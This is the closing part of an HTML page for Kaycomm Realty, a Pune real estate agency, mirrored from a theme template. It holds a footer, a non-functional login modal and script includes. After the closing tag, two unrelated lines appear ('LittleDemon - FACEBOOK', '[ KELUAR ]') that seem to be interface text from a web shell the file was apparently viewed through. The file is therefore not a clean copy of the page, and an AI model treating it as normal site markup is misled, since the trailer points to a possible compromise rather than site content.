	 </section>		
			<!-- ============================ Call To Action End ================================== -->
			
			
			<!-- ============================ Footer Start ================================== -->
			<footer class="dark-footer skin-dark-footer">
				<div>
					<div class="container">
						<div class="row">
							
							<div class="col-lg-3 col-md-4">
								<div class="footer-widget">
									<a class="nav-footer-logo" href="index.html">
										<span class="svg-icon text-light svg-icon-2hx">
										
										
											<img loading="eager" src="assets/img/KAYCOMM Logo.png" alt="Asteria Ten X Era Logo" class="fs-2 fw-bold text-light ms-1 my-0"   width="196" height="60" viewBox="0 0 24 24" fill="none">
											
										</span>
									</a>
									<div class="footer-add">
										<p>Tejas Eternity</p>
										<p>Balewadi Phata </p>
										<p>Pune, Maharashtra 411045</p>
									</div>
									
								</div>
							</div>		
							<div class="col-lg-2 col-md-4">
								<div class="footer-widget">
									<h4 class="widget-title">Navigations</h4>
									<ul class="footer-menu">
										<li><a href="about-us.html">About Us</a></li>
											<li><a href="checkout.html">Services</a></li>
										<li><a href="faq.html">FAQs Page</a></li>
									
										<li><a href="contact.html">Contact</a></li>
										<li><a href="blog.html">Blog</a></li>
									</ul>
								</div>
							</div>
									
							<div class="col-lg-2 col-md-4">
								<div class="footer-widget">
									<h4 class="widget-title">The Highlights</h4>
									<ul class="footer-menu">
										<li><a href="#">Apartment</a></li>
										<li><a href="#">Houses</a></li>
										<li><a href="#">Plots</a></li>
									
										<li><a href="#">Villas</a></li>
									</ul>
								</div>
							</div>
							
							<div class="col-lg-2 col-md-6">
								<div class="footer-widget">
									<h4 class="widget-title">Company</h4>
									<ul class="footer-menu">
										<li><a href="#">Awards</a></li>
										<li><a href="#">Events</a></li>
										<li><a href="#">News</a></li>
										
									</ul>
								</div>
							</div>
							
							
							<div class="col-lg-2 col-md-6">
								<div class="footer-widget">
									<h4 class="widget-title">Social Media</h4>
									<ul class="footer-menu">
										  <li><a href="https://www.facebook.com/kaycomm.in/"><i class="fa-brands fa-facebook"></i></a></li>
										<li><a href="https://www.instagram.com/kaycommin"><i class="fa-brands fa-instagram"></i></a></li>	
										<li><a href="https://www.linkedin.com/in/kaycomm-realty"><i class="fa-brands fa-linkedin"></i></a></li>
										
									</ul>
								</div>
							</div>
							
							
						
							
						</div>
					</div>
				</div>
				
				<div class="footer-bottom">
					<div class="container">
						<div class="row align-items-center">
							
							<div class="col-lg-6 col-md-6">
								<p class="mb-0">© 2024 Kaycomm Realty LLP. Designd By <a href="https://kaycomm.in/">KAYCOMM</a> All Rights Reserved</p>
								<p class="mb-0">Agent Rera: Rera Certification Number (Maharastra) A52100022646</p>
								
							</div>
							
							<!--<div class="col-lg-6 col-md-6 text-right">-->
							<!--	<ul class="footer-bottom-social">-->
							<!--		<li><a href="#"><i class="fa-brands fa-facebook"></i></a></li>-->
							<!--		<li><a href="#"><i class="fa-brands fa-twitter"></i></a></li>-->
							<!--		<li><a href="#"><i class="fa-brands fa-instagram"></i></a></li>-->
							<!--		<li><a href="#"><i class="fa-brands fa-linkedin"></i></a></li>-->
							<!--	</ul>-->
							<!--</div>-->
							
						</div>
					</div>
				</div>
			</footer>
			<!-- ============================ Footer End ================================== -->
			
			<!-- Log In Modal -->
			<div class="modal fade" id="login" tabindex="-1" role="dialog" aria-labelledby="registermodal" aria-hidden="true">
				<div class="modal-dialog modal-dialog-centered login-pop-form" role="document">
					<div class="modal-content" id="registermodal">
						<span class="mod-close" data-bs-dismiss="modal" aria-hidden="true">
							<span class="svg-icon text-primary svg-icon-2hx">
								<svg width="32" height="32" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
									<rect opacity="0.3" x="2" y="2" width="20" height="20" rx="10" fill="currentColor"/>
									<rect x="7" y="15.3137" width="12" height="2" rx="1" transform="rotate(-45 7 15.3137)" fill="currentColor"/>
									<rect x="8.41422" y="7" width="12" height="2" rx="1" transform="rotate(45 8.41422 7)" fill="currentColor"/>
								</svg>
							</span>
						</span>
						<div class="modal-body">
							<h4 class="modal-header-title">Log In</h4>
							<div class="d-flex align-items-center justify-content-center mb-3">
								<span class="svg-icon text-primary svg-icon-2hx">
									<svg width="80" height="80" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
										<path d="M15.8797 15.375C15.9797 15.075 15.9797 14.775 15.9797 14.475C15.9797 13.775 15.7797 13.075 15.4797 12.475C14.7797 11.275 13.4797 10.475 11.9797 10.475C11.7797 10.475 11.5797 10.475 11.3797 10.575C7.37971 11.075 4.67971 14.575 2.57971 18.075L10.8797 3.675C11.3797 2.775 12.5797 2.775 13.0797 3.675C13.1797 3.875 13.2797 3.975 13.3797 4.175C15.2797 7.575 16.9797 11.675 15.8797 15.375Z" fill="currentColor"/>
										<path opacity="0.3" d="M20.6797 20.6749C16.7797 20.6749 12.3797 20.275 9.57972 17.575C10.2797 18.075 11.0797 18.375 11.9797 18.375C13.4797 18.375 14.7797 17.5749 15.4797 16.2749C15.6797 15.9749 15.7797 15.675 15.7797 15.375V15.2749C16.8797 11.5749 15.2797 7.47495 13.2797 4.07495L21.6797 18.6749C22.2797 19.5749 21.6797 20.6749 20.6797 20.6749ZM8.67972 18.6749C8.17972 17.8749 7.97972 16.975 7.77972 15.975C7.37972 13.575 8.67972 10.775 11.3797 10.375C7.37972 10.875 4.67972 14.375 2.57972 17.875C2.47972 18.075 2.27972 18.375 2.17972 18.575C1.67972 19.475 2.27972 20.475 3.27972 20.475H10.3797C9.67972 20.175 9.07972 19.3749 8.67972 18.6749Z" fill="currentColor"/>
									</svg>
								</span>
							</div>
							<div class="login-form">
								<form>
								
									<div class="form-floating mb-3">
										<input type="email" class="form-control" placeholder="name@example.com">
										<label>Email address</label>
									</div>
									
									<div class="form-floating mb-3">
									  <input type="password" class="form-control" placeholder="Password">
									  <label>Password</label>
									</div>
									
									<div class="form-group mb-3">
										<div class="d-flex align-items-center justify-content-between">
											<div class="flex-shrink-0 flex-first">
												<div class="form-check form-check-inline">
													<input class="form-check-input" type="checkbox" id="save-pass" value="option1">
													<label class="form-check-label" for="save-pass">Save Password</label>
												</div>	
											</div>
											<div class="flex-shrink-0 flex-first">
												<a href="#" class="link fw-medium">Forgot Password?</a>	
											</div>
										</div>
									</div>
									
									<div class="form-group">
										<button type="button" class="btn btn-lg btn-primary fw-medium full-width rounded-2">LogIn</button>
									</div>
								
								</form>
							</div>
							<div class="modal-divider"><span>Or login via</span></div>
							<div class="social-login mb-3">
								<ul>
									<li><a href="#" class="btn connect-fb"><i class="ti-facebook"></i>Facebook</a></li>
									<li><a href="#" class="btn connect-google"><i class="ti-google"></i>Google+</a></li>
								</ul>
							</div>
							<div class="text-center">
								<p class="mt-4">Have't Any Account? <a href="create-account.html" class="link fw-medium">Acreate An Account</a></p>
							</div>
						</div>
					</div>
				</div>
			</div>
			<!-- End Modal -->
			
			<a id="back2Top" class="top-scroll" title="Back to top" href="#"><i class="ti-arrow-up"></i></a>
			

		</div>
		<!-- ============================================================== -->
		<!-- End Wrapper -->
		<!-- ============================================================== -->

		<!-- ============================================================== -->
		<!-- All Jquery -->
		<!-- ============================================================== -->
		<script src="assets/js/jquery.min.js"></script>
		<script src="assets/js/popper.min.js"></script>
		<script src="assets/js/bootstrap.min.js"></script>
		<script src="assets/js/rangeslider.js"></script>
		<script src="assets/js/select2.min.js"></script>
		<script src="assets/js/jquery.magnific-popup.min.js"></script>
		<script src="assets/js/slick.js"></script>
		<script src="assets/js/slider-bg.js"></script>
		<script src="assets/js/lightbox.js"></script> 
		<script src="assets/js/imagesloaded.js"></script>
		 
		<script src="assets/js/custom.js"></script>
		<!-- ============================================================== -->
		<!-- This page plugins -->
		<!-- ============================================================== -->

	</body>

<!-- Mirrored from shreethemes.net/resido-live/resido/home-10.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 07 Aug 2024 05:47:33 GMT -->
</html>

LittleDemon - FACEBOOK
[ KELUAR ]